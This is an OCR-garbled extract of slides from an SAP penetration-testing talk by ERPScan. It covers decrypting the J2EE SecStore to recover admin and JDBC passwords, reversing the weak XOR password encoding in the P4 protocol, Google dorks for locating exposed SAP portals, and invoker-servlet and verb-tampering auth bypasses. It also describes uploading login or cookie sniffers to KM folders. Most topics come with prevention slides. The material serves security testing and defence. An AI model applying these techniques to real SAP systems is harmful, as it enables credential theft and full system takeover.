• AddiAonal services – SAP Portal – SAP SDM – SAP SDM Admin – SAP LogViewer – SAP J2EE Telnet
119
![Page 120: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/120.jpg)
SAP Security storage
120
• The SAP J2EE Engine stores the database user SAP<SID>DB and all configuraAons in specific file
• The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm.
• \usr\sap\<SID>\SYS\global\security\data\SecStore.proper)es
![Page 121: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/121.jpg)
config.proper%es
121
rdbms.maximum_connections=5 system.name=TTT secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties secstorefs.lib=/oracle/TTTsapmnt/global/security/lib rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar rdbms.connection=jdbc/pool/TTT rdbms.initial_connections=1
![Page 122: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/122.jpg)
secstore.proper%es
122
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ $internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt $internal/mode=encrypted admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC
![Page 123: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/123.jpg)
profit
123
• We have an encrypted password • We have a key to decrypt it • We got the J2EE_ADMIN and JDBC password!
![Page 124: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/124.jpg)
Preven%on
124
• Install SAP note 1619539 • Restrict read access to files SecStore.proper)es and SecStore.key
![Page 125: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/125.jpg)
125
SAP Visual Admin security
![Page 126: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/126.jpg)
SAP VisualAdmin
126
• SAP Visual Admin – remote tool for controlling J2EE Engine • Use p4 protocol – SAP’s proprietary • By default all data transmiPed in cleartext • P4 can be configured to use SSL to prevent MITM • Passwords transmiPed by some sort of encrypAon • In reality it is some sort of Base64 transform with known key
![Page 127: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/127.jpg)
SAP VisualAdmin data
127
![Page 128: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/128.jpg)
Insecure password encryp%on in P4
128
/* 87 */ char mask = 43690; /* 88 */ char check = 21845; /* 89 */ char[] result = new char[data.length + 1]; /* */ /* 91 */ for (int i = 0; i < data.length; ++i) { /* 92 */ mask = (char)(mask ^ data[i]); /* 93 */ result[i] = mask; /* */ } /* 95 */ result[data.length] = (char)(mask ^ check); /* */ /* 97 */ return result;
![Page 129: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/129.jpg)
Defense
129
• Use SSL for securing all data transmi�ng between server-‐server and server-‐client connecAons hPp://help.sap.com/saphelp_nwpi71/helpdata/de/14/ef2940cbf2195de10000000a1550b0/content.htm
![Page 130: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/130.jpg)
130
SAP NetWeaver HTTP security
![Page 131: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/131.jpg)
SAP Google dorks
131
SAP HTTP Services can be easily found in internet: • inurl:/irj/portal • inurl:/IciEventService sap • inurl:/IciEventService/IciEventConf • inurl:/wsnavigator/jsps/test.jsp • inurl:/irj/go/km/docs/
![Page 132: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/132.jpg)
Informa%on disclose
132
• Kernel or applicaAon release and SP version. ERPSCAN-‐11-‐023,ERPSCAN-‐11-‐027, DSECRG-‐00208
• ApplicaAon logs and traces DSECRG-‐00191,DSECRG-‐00232
• Username ERPSCAN-‐00231
• Internal port scanning, Internal User bruteforce ERPSCAN-‐11-‐032,DSECRG-‐00175
![Page 133: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/133.jpg)
Informa%on disclose
133
![Page 134: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/134.jpg)
Informa%on disclose
134
![Page 135: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/135.jpg)
User disclose ERPSCAN-‐00231
135
![Page 136: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/136.jpg)
Internal Port scan ERPSCAN-‐11-‐032
Host is not alive
136
Port closed
HTTP port
SAP port
![Page 137: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/137.jpg)
Preven%on
137
• Install SAP notes 1548548,1545883,1503856,948851, 1545883 • Update the latest SAP notes every month • Disable unnecessary applicaAons
![Page 138: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/138.jpg)
Authen%ca%on
138
• Declara%ve authen%ca%on: - The Web container (J2EE Engine) handles authenAcaAon - Example: J2EE Web applicaAons
• Programma%c authen%ca%on. - Components running on the J2EE Engine authenAcate directly against
the User Management Engine (UME) using the UME API. - Example: Web Dynpro, Portal iViews
![Page 139: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/139.jpg)
Declara%ve authen%ca%on
139
WEB.XML file is stored in WEB-‐INF directory of applicaAon root.
<security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint>
![Page 140: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/140.jpg)
Invoker servlet
140
• FuncAonality for rapid calling servlets by their class name • Possible to call any servlet from applicaAon even if it is not
declared in WEB.XML • Call it directly by using /servlet/ directory and name of the class • Like this /servlet/com.sap.admin.CriAcal.AcAon
![Page 141: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/141.jpg)
Invoker servlet auth bypass
141
<servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet-class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint>
![Page 142: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/142.jpg)
Preven%on
142
• Install latest updates • Disable feature by changing the value of the “EnableInvokerServletGlobally” property of the servlet_jsp service on the server nodes to “false”. • To enable invoker servlet for some applicaAons check SAP note 1445998 • For SAP NetWeaver Portal, see SAP Note 1467771
![Page 143: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/143.jpg)
143
DEMO 24: SAP NetWeaver J2EE invoker servlet
unauthorized file read
![Page 144: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/144.jpg)
144
DEMO 25: SAP NetWeaver J2EE invoker servlet file read
+ secstore decrypt
![Page 145: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/145.jpg)
Verb Tampering
145
<security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint>
What if we will use HEAD instead of GET ?
![Page 146: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/146.jpg)
Verb Tampering example: Auth bypass
• AdministraAve interface for managing J2EE engine (CTC) • Can be accessed remotely • Can run user management acAons
- Create new users - Assign them to any Roles - Execute OS command on the server side - Create RFC DesAnaAons - Read RFC DesAnaAons info
146
It means that a`acker get full access to SAP and OS
![Page 147: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/147.jpg)
147
DEMO 26: SAP NetWeaver J2EE verb tampering user
crea)on
![Page 148: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/148.jpg)
Preven%on
148
PrevenAon: • Install SAP note 1503579,1616259 • Scan applicaAons using ERPScan WEB.XML check tool or
manually • Secure WEB.XML by deleAng all <hPp-‐method> • Disable applicaAon that are not necessary
![Page 149: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/149.jpg)
149
SAP NetWeaver Portal Security
![Page 150: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/150.jpg)
SAP Portal
• Point of web access to SAP systems • Point of web access to other corporate systems • Way for aPackers to get access to SAP from the Internet • ~1000 Portals in the world, according to Shodan • ~200 Portals in the world according to Google
150
![Page 151: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/151.jpg)
Portal issues
• SAP implements SSO using the Header Variable Login Module
151
credenAals
check
okay cookie
APacker
header_auth
cookie
![Page 152: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/152.jpg)
Knowledge Management
• One of Portal modules is SAP Knowledge Management. • KM is addiAonal funcAonality • It is designed to aggregate all user documents and create a
knowledge base • Like Sharepoint • An aPacker can:
– Get read access to criAcal documents – Create phishing pages which will steal logins and passwords.
152
![Page 153: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/153.jpg)
KM Documents
• KM by default can be found here /irj/go/km/navigaAon • SomeAmes Guest user can have access to KM • You can test listed folders:
– /irj/go/km/navigation/userhome/ – /irj/go/km/navigation/docs/ – /irj/go/km/navigation/documents/Public Documents/ – /irj/go/km/navigation/Entry Points/Public Documents/
153
![Page 154: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/154.jpg)
KM Documents
• SomeAmes it is possible to put documents into shared folders • Like this folder /irj/go/km/docs/documents/Public Documents/ • You can upload HTML file with login sniffer or cookie sniffer
154
![Page 155: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/155.jpg)
SAP Security
155
Ques)ons?
![Page 156: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/156.jpg)
We devote aden)on to the requirements of our customers and prospects, and constantly improve our product. If you presume that our scanner lacks a par)cular func)on, you can e-‐mail us or give us a call. We will be glad to consider your sugges)ons for the next releases or monthly updates.
156
web: www.erpscan.com e-‐mail: [email protected], [email protected]
Conclusion